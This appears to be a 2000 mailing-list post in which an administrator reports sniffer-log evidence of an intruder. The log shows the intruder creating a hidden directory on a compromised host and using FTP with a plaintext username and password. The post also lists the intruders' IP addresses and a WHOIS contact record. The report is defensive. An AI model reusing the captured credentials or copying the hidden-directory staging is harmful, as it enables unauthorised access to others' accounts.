I was looking throught he sniff log (only 2 days of data
preserved) to e-mail the sysadmins of probed/cracked sites
when I found this:
---------
: ls
: mkdir /^H.a
: mkdir .a
: cd .a
: ftp ftp.xoom.com
USER chrometnt
PASS phorce31337
---------
Smells of a skript-kiddie... falls into his own latrine...
---------
Registrant:____________________________________________
XOOM.com, Inc. (XOOM2-DOM)_____________________________
300 Montgomery St., 3rd Floor_______________________
San Francisco, CA 94104_____________________________
Domain Name: XOOM.COM_______________________________
Administrative Contact, Technical Contact, Zone Cont
Smith, Dave (DS8987) dave_at_XOOM.COM_____________
(415) 288-2500 (FAX) (415) 288-2580______________
Billing Contact:____________________________________
Administrator, Billing (AB401-ORG) billing_at_XOOM
(415) 288-2500___________________________________
Fax- (415) 288-2580____________________________________
Record last updated on 12-Jul-1999._________________
Record created on 03-Dec-1996.______________________
Database last updated on 8-Jan-2000 12:47:34 EST.___
Domain servers in listed order:_____________________
NAME.ROC.FRONTIERNET.NET 209.130.187.10_____________
NAME.PHX.FRONTIERNET.NET 206.165.6.10_______________
NS1.XOOM.COM 206.132.185.58_____
NS2.XOOM.COM 206.132.185.59____
NS3.XOOM.COM 206.132.185.199__
---------
This was ON another host!! (local to us). I will be sending
their full info into Pitt's security folks and to root_at_host.
User(s) doing the connecting/cracking:
Name: mel-0511-145.ports.iprimus.net.au
Address: 202.138.39.145
*AND*
Name: mel-0212-234.ports.iprimus.net.au
Address: 203.134.25.234
*AND*
Name: ppp-003.cust20.adl.chariot.net.au
Address: 210.9.20.3
Cheers,
Filip G.
Filip "I'll buy a vowel" Gieszczykiewicz | http://www.repairfaq.org/
(filipg_at_corona.eps.pitt.edu)
I am the river itself and the leaf floating its currents.
I am steering. I am swept. I am.
Received on Jan 10 2000
Intro
